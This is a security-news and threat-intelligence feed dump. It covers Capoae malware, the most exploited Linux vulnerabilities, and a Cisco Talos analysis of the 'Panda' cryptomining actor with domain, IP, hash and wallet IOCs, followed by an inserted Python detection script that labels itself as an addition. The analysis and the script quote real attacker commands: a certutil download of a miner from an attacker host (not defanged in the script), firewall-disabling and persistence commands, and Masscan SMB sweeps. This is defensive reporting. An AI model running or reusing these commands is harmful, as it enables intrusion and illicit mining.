([CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>)), NoneCms ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), and Jenkins ([CVE-2019-1003029](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003029>) and [CVE-2019-1003030](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003030>)) to brute force its way into systems running SSH and ultimately launch the XMRig mining software.\n\nWhat's 
more, the attack chain stands out for its persistence tricks, which includes choosing a legitimate-looking system path on the disk where system binaries are likely to be found as well as generating a random six-character filename that's then subsequently used to copy itself into the new location on the system before deleting the malware upon execution.\n\n\"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible,\" Cashdollar said. \"The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here.\"\n\n\"Don't use weak or default credentials for servers or deployed applications,\" Cashdollar added. \"Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-21T10:08:00", "type": "thn", "title": "New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062", "CVE-2019-1003029", "CVE-2019-1003030", "CVE-2020-14882"], "modified": "2021-09-21T10:08:05", "id": "THN:B36CB9AC96CE2C515157963E75E4AC6A", "href": "https://thehackernews.com/2021/09/new-capoae-malware-infiltrates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the 
deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) 
(CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository have been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure 
containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", 
"CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. 
Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, and IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used Masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. 
\n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. 
Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files by running cacls.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to the Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp, which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. 
The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. 
Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. 
Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. 
The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known Panda domains. The sample also contacted li[.]bulehero2019[.]club.

Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools, including Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.

[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)

[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)

## Conclusion

Panda's operational security remains poor: many of their old and current domains are hosted on the same IP, and their TTPs have remained relatively similar across campaigns. The payloads themselves are also not very sophisticated.

However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Information from the HFS (HTTP File Server) instances Panda used to host payloads shows that this malware had a wide reach, and rough calculations of the amount of Monero generated show they made around 1,215 XMR through their malicious activities, which today equals around $100,000, though the amount of realized profit depends on when they sold.

Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits against multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch.
And if a cryptocurrency miner is able to infect your system, another actor could use the same infection vector to deliver other malware. Panda remains an active threat, and Talos will continue to monitor their activity in order to thwart their operations.

## COVERAGE

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>)

[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.
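Product coverage aside, the Panda tradecraft documented in this post lends itself to plain process-creation hunting: certutil invoked with "-urlcache -split -f" and a URL, a loopback ping chained into "start", an executable whose name is 15 letters followed by five digits, and Masscan sweeping TCP/445 from an endpoint. The following Python is an added example, not code from this post or from Cisco. The events it runs over are constructed to resemble endpoint process-creation records (the "host", "parent" and "cmd" field names are assumptions), and the rules are written from the behaviors described above, not from any vendor signature.

```python
"""Hunt for the Panda tradecraft described in this post in process-creation events.

Added example, not code from the Talos post: the events below are constructed to
resemble endpoint process-creation records, and the field names are assumptions.
"""
import re

# Constructed sample events (not real telemetry). The last two are benign controls.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "powershell.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://fid.hognoob.se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe"},
    {"host": "ws01", "parent": "cmd.exe",
     "cmd": r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\upnpprhost.exe"},
    {"host": "ws02", "parent": "powershell.exe",
     "cmd": r"C:\Windows\Temp\xblzcdsafdmqslz19595.exe"},
    {"host": "ws02", "parent": "cmd.exe",
     "cmd": r"masscan.exe -p445 -iL ip.txt -oL results.txt"},
    {"host": "ws03", "parent": "explorer.exe",
     "cmd": r"certutil.exe -verify C:\Users\alice\Downloads\cert.cer"},
    {"host": "ws03", "parent": "services.exe",
     "cmd": r"C:\Program Files\Vendor\agentsvc.exe -service"},
]

# Panda's dropper name: 15 letters followed by 5 digits, as a path component.
RANDOM_NAME = re.compile(r"(?:^|[\\/])[a-z]{15}[0-9]{5}\.exe(?:\s|$)", re.IGNORECASE)

def is_certutil_download(cmd):
    """certutil abused as a downloader: -urlcache -split -f <http(s) URL>."""
    lower = cmd.lower()
    return ("certutil" in lower and "-urlcache" in lower
            and re.search(r"-f\s+https?://", cmd, re.IGNORECASE) is not None)

def is_ping_delay_then_start(cmd):
    """ping to loopback chained into 'start': a sleep before launching the dropped binary."""
    return re.search(r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*&+\s*start\b", cmd, re.IGNORECASE) is not None

def is_random_dropper_name(cmd):
    """Execution of a 15-letter + 5-digit executable name."""
    return RANDOM_NAME.search(cmd) is not None

def is_masscan_smb_sweep(cmd):
    """Masscan run from an endpoint looking for TCP/445 (MS17-010 candidates)."""
    return "masscan" in cmd.lower() and re.search(r"-p\s*445\b", cmd, re.IGNORECASE) is not None

RULES = {
    "certutil_download": is_certutil_download,
    "ping_delay_then_start": is_ping_delay_then_start,
    "random_dropper_name": is_random_dropper_name,
    "masscan_smb_sweep": is_masscan_smb_sweep,
}

def hunt(events):
    """Return (host, rule id, command line) for every rule that matches an event."""
    hits = []
    for ev in events:
        for rule_id, predicate in RULES.items():
            if predicate(ev["cmd"]):
                hits.append((ev["host"], rule_id, ev["cmd"]))
    return hits

if __name__ == "__main__":
    for host, rule_id, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host}\t{rule_id}\t{cmd}")
```

Run it as a script to print the hits. The benign certutil -verify line is there to show that the rule keys on the downloader switches and a URL, not on the binary name; the four malicious events each trip exactly one rule, and the two control events trip none.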
[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## IOCs

### Domains

a45[.]bulehero[.]in
a46[.]bulehero[.]in
a47[.]bulehero[.]in
a48[.]bulehero[.]in
a88[.]bulehero[.]in
a88[.]heroherohero[.]info
a[.]bulehero[.]in
aic[.]fxxxxxxk[.]me
axx[.]bulehero[.]in
b[.]bulehero[.]in
bulehero[.]in
c[.]bulehero[.]in
cb[.]fuckingmy[.]life
cnm[.]idc3389[.]top
down[.]idc3389[.]top
fid[.]hognoob[.]se
fxxk[.]noilwut0vv[.]club
haq[.]hognoob[.]se
idc3389[.]top
idc3389[.]cc
idc3389[.]pw
li[.]bulehero2019[.]club
list[.]idc3389[.]top
mi[.]oops[.]best
mx[.]oops[.]best
nrs[.]hognoob[.]se
oo[.]mygoodluck[.]best
pool[.]bulehero[.]in
pxi[.]hognoob[.]se
pxx[.]hognoob[.]se
q1a[.]hognoob[.]se
qie[.]fxxxxxxk[.]me
rp[.]oiwcvbnc2e[.]stream
uio[.]heroherohero[.]info
uio[.]hognoob[.]se
upa1[.]hognoob[.]se
upa2[.]hognoob[.]se
wiu[.]fxxxxxxk[.]me
yxw[.]hognoob[.]se
zik[.]fxxxxxxk[.]me

### IPs

184[.]168[.]221[.]47
172[.]104[.]87[.]6
139[.]162[.]123[.]87
139[.]162[.]110[.]201
116[.]193[.]154[.]122
95[.]128[.]126[.]241
195[.]128[.]127[.]254
195[.]128[.]126[.]120
195[.]128[.]126[.]243
195[.]128[.]124[.]140
139[.]162[.]71[.]92
3[.]123[.]17[.]223
46[.]173[.]217[.]80
5[.]56[.]133[.]246

### SHA-256

2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

### Monero Wallets

49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
